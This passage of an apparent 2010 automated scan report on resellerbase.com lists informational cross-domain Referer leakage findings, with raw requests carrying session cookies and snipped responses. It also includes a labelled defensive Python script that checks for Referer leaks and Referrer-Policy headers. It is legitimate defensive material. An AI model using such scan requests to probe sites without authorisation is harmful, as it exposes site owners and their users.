<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.reseller-products.com" name="link_11"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.reseller-products.com" name="link_11"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.73. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /browsepr.php?pg_which=2&pr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 49647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...
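The findings in this section all come from one check: the page was requested with a query string, and its response links to other hosts, so a browser following those links sends the query string to those hosts in the Referer header. Note that the W3C validator links present in every response here (`check?uri=referer`, `check/referer`) are built to consume the Referer, so the query string reaches w3.org by design; in the 404 responses below those validator links are the only cross-domain links reported. The following Python script is an added example, not part of the XSS.CX report or of the scanned site, that reproduces the check offline and adds the one thing a 2010 scan could not assess: whether a Referrer-Policy header on the response would stop the query string from travelling. The request line, host and HTML body are constructed here, modelled on finding 6.73; `referer_leak_check` and `referrer_policy_leaks_query` are names chosen for this example.

```python
"""Offline re-implementation of the check behind these findings: did the page
load from a URL with a query string, and does its response link to other
domains that would receive that query string in the Referer header?
Added example; not part of the original report or of the scanned site."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LinkCollector(HTMLParser):
    """Collect URL-bearing attributes from the tags a browser will navigate
    to or fetch from: those are the requests that carry a Referer."""

    _URL_ATTRS = {"a": "href", "img": "src", "script": "src", "iframe": "src",
                  "frame": "src", "link": "href", "form": "action"}

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        wanted = self._URL_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.links.append(value)


def referer_leak_check(request_line, host, body):
    """Return {'has_query', 'links', 'hosts'} for one request/response pair.

    request_line -- the HTTP request line, e.g. 'GET /browsepr.php?pg_which=2&pr= HTTP/1.1'
    host         -- value of the Host header
    body         -- the HTML response body
    A finding needs both: a query string in the loaded URL and at least one
    http(s) link whose host differs from the page's host.
    """
    _method, target, _version = request_line.split()
    page_url = urljoin("http://" + host + "/", target)
    has_query = bool(urlsplit(page_url).query)

    collector = _LinkCollector()
    collector.feed(body)
    cross_domain = set()
    for raw in collector.links:
        absolute = urljoin(page_url, raw)        # resolve relative links first
        parts = urlsplit(absolute)
        if parts.scheme not in ("http", "https"):
            continue                             # mailto:, javascript:, data:
        if parts.hostname and parts.hostname.lower() != host.lower():
            cross_domain.add(absolute)
    links = sorted(cross_domain)
    hosts = sorted({urlsplit(u).hostname for u in links})
    return {"has_query": has_query, "links": links, "hosts": hosts}


# Referrer-Policy values that still send the full referring URL (path and
# query) to a cross-origin http link.  An absent header means "browser
# default", which older browsers treated as no-referrer-when-downgrade, so
# it is counted as leaking here (conservative assumption).
_LEAKS_QUERY = {"", "unsafe-url", "no-referrer-when-downgrade"}
_KNOWN = _LEAKS_QUERY | {"no-referrer", "origin", "origin-when-cross-origin",
                         "same-origin", "strict-origin",
                         "strict-origin-when-cross-origin"}


def referrer_policy_leaks_query(headers):
    """True if the response headers (list of (name, value) pairs) let a
    cross-origin http link learn the query string of the page linking to it."""
    policy = ""
    for name, value in headers:
        if name.lower() != "referrer-policy":
            continue
        # The header may carry a comma-separated fallback list; browsers apply
        # the last token they recognise, unknown tokens are ignored.
        for token in value.split(","):
            token = token.strip().lower()
            if token in _KNOWN:
                policy = token
    return policy in _LEAKS_QUERY


# Constructed sample modelled on finding 6.73 above (not the captured bytes):
# a query-string URL whose page links to an affiliate network, to the W3C
# validators, and to same-host resources that must not count.
SAMPLE_REQUEST_LINE = "GET /browsepr.php?pg_which=2&pr= HTTP/1.1"
SAMPLE_HOST = "www.resellerbase.com"
SAMPLE_HEADERS = [("Server", "Apache/2"), ("X-Powered-By", "PHP/5.2.14"),
                  ("Content-Type", "text/html")]      # no Referrer-Policy
SAMPLE_BODY = """<html><body>
<a href="/browsepr.php?pg_which=3&pr=">next page</a>
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b>Offer</b></a>
<img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" alt="" />
<a href="mailto:webmaster@resellerbase.com">contact</a>
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" alt="Valid XHTML" /></a>
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" alt="Valid CSS" /></a>
</body></html>"""


def demo():
    """Run both checks on the constructed sample and return the combined verdict."""
    result = referer_leak_check(SAMPLE_REQUEST_LINE, SAMPLE_HOST, SAMPLE_BODY)
    result["policy_leaks_query"] = referrer_policy_leaks_query(SAMPLE_HEADERS)
    result["finding"] = (result["has_query"] and bool(result["links"])
                         and result["policy_leaks_query"])
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The check deliberately resolves relative links and discards non-http(s) schemes before comparing hosts, otherwise same-host navigation and `mailto:` links inflate the result. Severity "Information" is the right level as long as the leaked query string carries nothing sensitive (here it is pagination and a sort key); the same check becomes a real problem on a URL that carries a session or reset token. On the server side the fix is a `Referrer-Policy` header such as `strict-origin-when-cross-origin`, or `rel="noreferrer"` on the individual outbound links.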

6.74. http://www.resellerbase.com/communication/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.75. http://www.resellerbase.com/communication/broadband/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.76. http://www.resellerbase.com/communication/broadband/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/googlepr.php?link_id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.77. http://www.resellerbase.com/communication/broadband/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://worldkom.net/reseller" name="link_16"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://worldkom.net/reseller" name="link_16"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.78. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.79. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.80. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.81. http://www.resellerbase.com/communication/broadband/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.82. http://www.resellerbase.com/communication/broadband/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.83. http://www.resellerbase.com/communication/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/googlepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/googlepr.php?link_id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.84. http://www.resellerbase.com/communication/mobile-content/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.85. http://www.resellerbase.com/communication/mobile-content/googlepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /communication/mobile-content/googlepr.php?link_id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
